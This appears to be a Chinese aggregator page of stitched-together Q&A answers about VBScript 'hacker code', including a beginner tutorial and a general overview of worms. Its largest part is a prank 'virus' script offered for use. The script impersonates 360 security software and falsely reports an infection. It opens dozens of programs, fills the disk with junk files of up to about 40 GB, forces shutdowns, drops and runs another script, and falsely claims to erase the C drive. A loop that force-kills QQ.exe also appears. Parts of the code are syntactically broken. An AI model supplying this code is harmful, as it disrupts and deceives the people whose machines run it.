当前位置：首页 > 联系黑客 > 正文内容

vbs黑客代码大全（vbs代码病毒）

hacker2年前 (2022-06-02)联系黑客88

本文导读目录：

1、求VBS代码大神来看看我电脑开机密码被修改了求告诉我的密码

2、uf.vbs是什么文件？起什么作用

3、vbs自动检测qq.exe进程并关闭的代码

4、VBS是什么文件???

5、网络蠕虫病毒代码分析

6、解码vbs某编码

7、vbs整人代码

8、求高手讲解一下怎么设置整人用的vbs，还有怎么将代码输入进文档里

求VBS代码大神来看看我电脑开机密码被修改了求告诉我的密码

你这个不全吧，里面没有修改密码的部分

另外这种低级的东西，应该是那些学了点黑客技术的人臭显摆，U盘进winpe直接修改回去就行了。。。

那修改你密码的并不是通过这个脚本完成的，这个只是在完成修改后运行用于告知你付款信息的而已，如果不想重装又不想助长该类人的嚣张气焰的话，可通过上述方法（winpe）修改密码即可

uf.vbs是什么文件？起什么作用

就是windows系统的一种脚本，用记事本就可以看到源代码。在没有语法错误的前提下，直接双击左键就可以运行。但必须注意的是，由于VBS的简单可行性，现在许多黑客高手都会利用VBS写一些病毒或者整人代码，所以打开VBS之前，一定要确定自己知道这段代码的作用以及流程！

vbs自动检测qq.exe进程并关闭的代码

Set objShell = CreateObject("Wscript.Shell")

Do While true

objShell.Run "cmd.exe /c taskkill /im QQ.exe /f /t",0,true

WScript.Sleep 5000

loop

保存为VBS文件运行即可，要终止检测关闭QQ程序，在命令窗口中输入：

taskkill /im wscript.exe /f 回车即可

或者编写一个终止正在运行的VBS程序文件

CreateObject("Wscript.Shell").popup "已终止检测关闭QQ，现在可以上QQ聊天了。",3,"终止正在运行的VBS脚本文件"

CreateObject("Wscript.Shell").Run "cmd.exe /c taskkill /im wscript.exe /f ",0

和上面一样保存为VBS文件

VBS是什么文件???

跟我学编程1（VBS基础篇）

什么是VBScript呢? VBScript的全称是:Microsoft Visual Basic Script Editon.(微软公司可视化BASIC脚本版). 正如其字面所透露的信息, VBS(VBScript的进一步简写)是基于Visual Basic的脚本语言. 我进一步解释一下, Microsoft Visual Basic是微软公司出品的一套可视化编程工具, 语法基于Basic. 脚本语言, 就是不编译成二进制文件, 直接由宿主(host)解释源代码并执行, 简单点说就是你写的程序不需要编译成.exe, 而是直接给用户发送.vbs的源程序, 用户就能执行了.

我知道菜鸟现在最关心的就是用什么工具来开发VBS程序了, 答案是:记事本.(Notepad).我不是开玩笑, 其实任何一种文本编辑器都可以用来开发VBS开发, 只不过记事本是由系统自带的, 比较好找而已. 尽管如此, 我还是建议你去下载一个专业的文本编辑器, 因为这些工具可以提供 "语法高亮"等功能, 更加方便开发, 用哪一个随你喜好, 我比较喜欢Edit Plus (2.10).

OK, 我们先来写一个VBScript程序热热身.

REM 输入并回显你的名字

\'使用InputBox和Msgbox函数

Dim name,msg

msg="请输入你的名字:"

name=Inputbox(msg,"名称")

Msgbox(name)

把上面的程序清单输入到记事本里面, 然后保存为以.vbs为扩展名的文件("保存类型"里面选择"所有文件").然后双击运行, 观察运行结果. 注意:请自己输入程序清单, 不要复制-粘贴

我来解释一下这个程序, 第一行和第二行的开头分别是"REM"语句和" \' ", 这两个东西的作用是相同的, 表示本行是注释行, 就是说这两行什么也不干,只是用来说明这段程序的功能, 版权信息等等. 注释行是程序最重要的部分之一, 尽管它不是必需的, 但对于其他人阅读源代码, 以及自己分析源代码是很有好处的. 好的习惯是在必要的地方加上清晰, 简洁的注释.

Dim用来声明一个变量, 在VBS中, 变量类型并不是那么重要, 就是说VBS会帮你自动识别变量类型, 而且变量在使用前不一定要先声明, 程序会动态分配变量空间. 在VBS中你不用考虑name储存的是一个整数还是一个小数(学名叫"浮点数"), 也不用考虑是不是字符串(一串字符, 比如:"Hello World"), VBS会自动帮你搞定. 所以第三行语句可以删除, 效果不会变, 但我强烈反对这么做, 一个变量的基本原则就是:先声明,后使用.变量名用字母开头,可以使用下划线,数字, 但不能使用vbs已经定义的字, 比如dim, 也不能是纯数字.

下一行被称之为"赋值", "="是赋值符号, 并不是数学中的等于号, 尽管看起来一样.这是正统的理解, 你要理解成等于也没有什么不可. 赋值号的左边是一个变量, 右边是要赋给变量的值, 经过赋值以后, msg这个变量在程序中等同于"请输入你的名字:"这个字符串,但当msg被再次复制的时候, 原值就会消失. 不光字符串, 其他任何变量都这样被赋值, 例如: a=2, b=12.222等等.

再往下,Inputbox和Msgbox是VBS内建的函数, 一个函数就相当于一个"黑箱", 有输入(参数)和输出(返回值), 你可以不用了解函数是怎么运作的, 只要了解这个函数能干什么就行了, 我们也可以定义自己的函数, 不过那要等到以后再讲. 现在我们只要了解, 一个函数可以有返回值也可以没有, 可以有参数也可以没有. 例如Inputbox就是有返回值的函数, 我们用赋值号左边的变量来"接"住InputBox的返回值--就是你输入的内容. 在inputbox右边的括号里是参数列表, 每个参数用","分隔开, 每个参数有不同的功效, 比如第一个参数会显示在提示里, 我们把msg这个变量作为第一个参数传给了Inputbox 函数, 而msg="请输入你的名字:", 所以我们在对话框的提示栏就会看到"请输入你的名字:" 第二个参数是对话框的标题, 我们用直接量(学名叫"常量", 这里是"字符串常量")传递给函数, 当然你也可以传递变量. Inputbox还有很多参数, 比如你在"名称"后面再加一个","然后输入随便一串字符(字符串,用双引号""包裹起来的一串字符叫做字符串)然后运行, 看看结果. 你会发现用于输入的文本框有了默认的值, 这就是第三个参数的作用.

Msgbox函数是用来输出的函数, 在VBS中没有专门的输出函数(BASIC中的print,C中的printf), 所以我们只能用对话框来观察输出结果, Msgbox的必要参数只有一个, 就是要输出的内容, 在这种情况下, 我们不需要理会msgbox的返回值. 关于Msgbox和Inputbox我们以后还会在讨论, 今天只是热热身, 到此为止.

要点:

1) 注释(以REM或\'开头)行在程序中不起作用, 但能让别人更容易读懂你的程序.

2) 变量好像一个盒子, 或一个代号, 可以代表你想代表的东西. 变量赋值使用"="

3) 以""包裹起来的字符称之为"字符串"

4) 函数像一个"黑箱", 有参数和返回值, 用"="左边的变量可以接住返回值

5) Inputbox函数弹出一个输入对话框,Msgbox则用于输出

作业:

1) 试验Inputbox的第三个参数

2) 写一段程序输出你的年龄

3) 写一段程序进行3次输入, 分别输入你和你父母的姓名(要求显示提示), 并分3次输出

参考资料：http://www.xurichensheng.com/bbs/printpage.asp?BoardID=5ID=6515

网络蠕虫病毒代码分析

蠕虫病毒是自包含的程序(或是一套程序),它能传播它自身功能的拷贝或它的某些部分到其

他的计算机系统中(通常是经过网络连接)。请注意，与一般病毒不同，蠕虫不需要将其自身附着到宿主程序，有两种类型的蠕虫：主机蠕虫与网络蠕虫。主计算机蠕虫完全包含在它们运行的计算机中，并且使用网络的连接仅将自身拷贝到其他的计算机中，主计算机蠕虫在将其自身的拷贝加入到另外的主机后，就会终止它自身(因此在任意给定的时刻，只有一个蠕虫的拷贝运行)，这种蠕虫有时也叫"野兔"，蠕虫病毒一般是通过1434端口漏洞传播。

比如近几年危害很大的“尼姆亚”病毒就是蠕虫病毒的一种，2007年1月流行的“熊猫烧香”以及其变种也是蠕虫病毒。这一病毒利用了微软视窗操作系统的漏洞，计算机感染这一病毒后，会不断自动拨号上网，并利用文件中的地址信息或者网络共享进行传播，最终破坏用户的大部分重要数据。蠕虫病毒的一般防治方法是：使用具有实时监控功能的杀毒软件，并且注意不要轻易打开不熟悉的邮件附件。

形成原因利用漏洞主动进行攻击

此类病毒主要是“红色代码”和“尼姆亚”，以及至今依然肆虐的“求职信”等。由于IE浏览器的漏洞（IFRAMEEXECCOMMAND），使得感染了“尼姆亚”病毒的邮件在不去手工打开附件的情况下病毒就能激活，而此前即便是很多防病毒专家也一直认为，带有病毒附件的邮件，只要不去打开附件，病毒不会有危害。“红色代码”是利用了微软IIS服务器软件的漏洞(idq.dll远程缓存区溢出)来传播，SQL蠕虫王病毒则是利用了微软的数据库系统的一个漏洞进行大肆攻击。

传播方式多样

如“尼姆亚”病毒和”求职信”病毒，可利用的传播途径包括文件、电子邮件、Web服务器、网络共享等等。

病毒制作技术新

与传统的病毒不同的是，许多新病毒是利用当前最新的编程语言与编程技术实现的，易于修改以产生新的变种，从而逃避反病毒软件的搜索。另外，新病毒利用Java、ActiveX、VBScript等技术，可以潜伏在HTML页面里，在上网浏览时触发。

解码vbs某编码

这个提示太明显了吧~

用提示代码得到以下字符串：

%25%42%35%25%44%41%25%42%36%25%46%45%25%42%39%25%44%38%25%43%33%25%44%43%25%43%32%25%45%42%25%33%41%25%34%37%25%36%46%25%32%44%25%37%34%25%36%46%25%32%44%25%33%32

再用以下代码

n=split(right(Nd,len(Nd)-1),"%",-1,1)

for each f in n

if f"" then

k=int("h"f)

d=dchr(k)

end if

得到以下字符串~

%B5%DA%B6%FE%B9%D8%C3%DC%C2%EB%3A%47%6F%2D%74%6F%2D%32

将此字符串粘贴到百度地址的wd=后面去搜就出来了~

http://www.baidu.com/s?wd=%B5%DA%B6%FE%B9%D8%C3%DC%C2%EB%3A%47%6F%2D%74%6F%2D%32

第二关密码:Go-to-2

vbs整人代码

大量的楼上已经说了。这个是本人原创，亲测有用。毒性嘛，就是会烧CPU，然后在这个vbs旁边创建一大堆垃圾文件（请准备好30G空间）【具体在代码中】

仅供恶搞娱乐和研究，没有攻击任何人，组织的意图。

set qstart = wscript.CreateObject("wscript.shell")

set qweb = CreateObject("Wscript.Shell")

set qwrite = CreateObject("scripting.filesystemobject")

set qsay = CreateObject("sapi.spvoice")

qstart.run "D:\病毒BGM.mp3" ' 《江南皮革厂倒闭了.mp3》请准备好放在D:\

msgbox "您的电脑已被病毒入侵！",vbokonly+vbExclamation,"360 Defender"

qstart.run "cmd.exe /c start appwiz.cpl"

qstart.run "cmd.exe /c start bthprops.cpl"

qstart.run "cmd.exe /c start calc.exe"

qstart.run "cmd.exe /c start cleanmgr.exe"

qstart.run "cmd.exe /c start cmd.exe"

qstart.run "cmd.exe /c start colorcpl.exe"

qstart.run "cmd.exe /c start control.exe"

qstart.run "cmd.exe /c start cttune.exe"

qstart.run "cmd.exe /c start desk.cpl"

qstart.run "cmd.exe /c start dfrgui.exe"

qstart.run "cmd.exe /c start dxdiag.exe"

qstart.run "cmd.exe /c start FileHistory.exe"

qstart.run "cmd.exe /c start Firewall.cpl"

qstart.run "cmd.exe /c start Fondue.exe"

qstart.run "cmd.exe /c start fontview.exe"

qstart.run "cmd.exe /c start fsquirt.exe"

qstart.run "cmd.exe /c start hdwwiz.cpl"

qstart.run "cmd.exe /c start inetcpl.cpl"

qstart.run "cmd.exe /c start intl.cpl"

qstart.run "cmd.exe /c start irprops.cpl"

qstart.run "cmd.exe /c start joy.cpl"

qstart.run "cmd.exe /c start LaunchTM.exe"

qstart.run "cmd.exe /c start Magnify.exe"

qstart.run "cmd.exe /c start main.cpl"

qstart.run "cmd.exe /c start mblctr.exe"

qstart.run "cmd.exe /c start mmsys.cpl"

qstart.run "cmd.exe /c start msinfo32.exe"

qstart.run "cmd.exe /c start mspaint.exe"

qstart.run "cmd.exe /c start ncpa.cpl"

qstart.run "cmd.exe /c start notepad.exe"

qstart.run "cmd.exe /c start powercfg.cpl"

qstart.run "cmd.exe /c start RTSnMg64.cpl"

qstart.run "cmd.exe /c start SnippingTool.exe"

qstart.run "cmd.exe /c start sysdm.cpl"

qstart.run "cmd.exe /c start TabletPC.cpl"

qstart.run "cmd.exe /c start telephon.cpl"

qstart.run "cmd.exe /c start timedate.cpl"

qstart.run "cmd.exe /c start write.exe"

qstart.run "cmd.exe /c start wscript.exe"

qstart.run "cmd.exe /c start wscui.cpl"

qstart.run "cmd.exe /c fsutil file createnew 1.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 2.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 3.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 4.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 5.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 6.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 7.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 8.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 9.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 10.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 11.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 12.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 13.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 14.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 15.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 16.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 17.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 18.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 19.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 20.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 21.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 22.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 23.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 24.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 25.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 26.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 27.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 28.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 29.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 30.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 31.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 32.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 33.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 34.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 35.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 36.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 37.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 38.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 39.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 40.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 41.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 42.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 43.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 44.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 45.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 46.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 47.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 48.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 49.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 50.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 51.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 52.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 53.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 54.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 55.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 56.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 57.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 58.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 59.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 60.bug 40000"

qstart.run "cmd.exe /c fsutil file createnew 61.bug 400000"

qstart.run "cmd.exe /c fsutil file createnew 62.bug 4000000"

qstart.run "cmd.exe /c fsutil file createnew 63.bug 40000000"

qstart.run "cmd.exe /c fsutil file createnew 64.bug 400000000"

qstart.run "cmd.exe /c fsutil file createnew 65.bug 4000000000"

qstart.run "cmd.exe /c fsutil file createnew 666.bug 40000000000"

wscript.sleep 25000

qstart.run "cmd.exe /c shutdown -s -t 60 -c ""360公司温馨提醒：因为这个游戏涉及非法内容，所以您的电脑将在60秒后自动关机"" ",0,true

qstart.run "cmd.exe /c echo 滚|clip"

A = INPUTBOX ("说！360是不是上帝？"+chr(13)+chr(13)+chr(13)+"（“滚”已复制到剪贴板，可以粘贴。）","360 Defender","不是",8000,7000)

IF A = "是" then

qstart.run "cmd.exe /c shutdown -a",0,true

msgbox "好的，现在您可以下载360安全卫士来杀毒了。",vbokonly,"360 Defender"

qweb.run"https://hao.360.com/"

loop

ELSEIF A = "不是" then

qstart.run "cmd.exe /c shutdown -a",0,true

msgbox chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+"您怎么这么懒呢？",vbokonly+vbQuestion,"360 Defender"

msgbox chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+"是时候锻炼锻炼了",vbokonly+vbInformation,"360 Defender"

msgbox "游戏规则：在开始后，请及时点击 “确定” 键来取消关机。"+chr(13)+"现在您可以把这个窗口x掉，或者点击确定，来开始游戏。",vbokonly+vbInformation,"360 Defender"

qstart.run "cmd.exe /c shutdown -s -t 5 ",0,true

msgbox "取消关机",vbokonly,"360 Defender"

qstart.run "cmd.exe /c shutdown -a",0,true

qweb.run"https://hao.360.com/"

loop

ELSEIF A = "" then

qstart.run "cmd.exe /c shutdown -a",0,true

msgbox "周鸿祎表示无语。"+chr(13)+chr(13)+chr(13)+"这样是不可能解决问题的",vbokonly,"360 Defender"

msgbox "自己探寻吧",vbokonly,"360 Defender"

qstart.run "cmd.exe /c shutdown -s -t 5",0,true

qstart.run "cmd"

qstart.run "cmd.exe /c shutdown -a",0,true

loop

ELSEIF A = "滚" then

qstart.run "cmd.exe /c shutdown -a",0,true

msgbox "emmmmmmmm",vbokonly,"360 Defender"

set qwriteb=qwrite.CreateTextFile( "D:\1.txt",,ture)

qwriteb.WriteLine "wscript.CreateObject(" chr(34) "wscript.shell" chr(34) ").run " chr(34) "D:\1.vbs" chr(34)

qwriteb.WriteLine "msgbox " chr(34) "滚" chr(34) ",vbokonly+vbinformation," chr(34) "360 Defender" chr(34)

qwriteb.close

qwrite.movefile "D:\1.txt","D:\1.vbs"

qstart.run "D:\1.vbs"

ELSE

qstart.run "cmd.exe /c shutdown -a",0,true

msgbox "由于您在说废话，但是您一定不想浪费时间说废话，所以该电脑对您有害。浪费别人时间就是谋财害命 ( 鲁迅 ) 。360积极维护您的财产权和生命健康权，决定不砸掉您的电脑。"+chr(13)+chr(13)+"那现在先把C盘给抹咯！",vbokonly+vbInformation,"360 Defender"

qsay.speak ("在抹掉C盘的过程中，您的电脑将会重启数次此瓷呲呲瓷此次次此瓷呲呲瓷此次次此瓷呲")

qweb.run"https://hao.360.com/"

qstart.run "cmd.exe /c shutdown -r -t 5",0,true

END IF